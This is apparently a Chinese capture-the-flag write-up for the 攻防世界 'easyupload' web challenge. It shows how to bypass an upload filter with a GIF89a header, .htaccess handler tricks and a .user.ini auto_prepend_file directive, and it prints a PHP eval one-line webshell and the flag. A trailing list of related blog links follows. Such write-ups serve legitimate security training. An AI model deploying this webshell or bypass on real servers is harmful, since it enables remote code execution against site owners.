攻防世界-Web-easyupload

知识点

1.user.int绕过限制

步骤

1.直接抓包,先测是上传限制。(上传png等文件时记得加上GIF89a文件头)

php文件被禁止上传,尝试上传.htaccess文件,用来解析png文件中的php代码,结果发现.htaccess中的内容被限制了。如下内容:

复制代码
方法一:
<FilesMatch "4.png">
SetHandler application/x-httpd-php
</FilesMatch>
 
方法二:
AddType application/x-httpd-php .png

在此处需要使用.user.ini,这个文件的作用和.htaccess差不多,都是使一个文件能够被执行。

.user.ini文件内容:(使1.png能够被当做php执行)

复制代码
GIF89a
auto_prepend_file=1.png

然后再上传png文件,里面写上一句话木马,这里上传png文件时,不能包含php字样,所以采用另外一种一句话木马

1.png文件内容:(注意这里不要有空格不然会连接不上)

复制代码
GIF89a
<?=eval($_POST['cmd']);?>

2.连接

flag:cyberpeace{1b4d400f5bdf7e215a443886721a1fab}

相关推荐
XH-hui9 小时前
【打靶日记】VulNyx 之 Lower6
linux·网络安全·vulnyx
NOVAnet202310 小时前
应对AI全球化部署挑战:南凌科技云连接服务实现算法模型全球稳定传输
网络·人工智能·科技·网络安全
任风雨13 小时前
11.9.14.ServletContext
web
任风雨13 小时前
11.9.13.ServletConfig
web
王火火(DDoS CC防护)1 天前
游戏盾是如何保障游戏安全稳定的?
游戏·网络安全·ddos攻击·sdk游戏盾
f0rev3r1 天前
NewStarCTF2025-WEEK3
ctf
XH-hui1 天前
【打靶日记】THL 之 Facultad
linux·网络安全·1024程序员节·thehackerlabs
希望奇迹很安静1 天前
DVWA靶场通关笔记
web安全·网络安全·ctf·文件上传
敲敲了个代码1 天前
[特殊字符] Web 字体裁剪优化实践:把 42MB 字体包瘦到 1.6MB
前端·javascript·学习·html·web
缘友一世1 天前
清除入侵痕迹(win&Linux&web)
网络安全·渗透测试·痕迹清除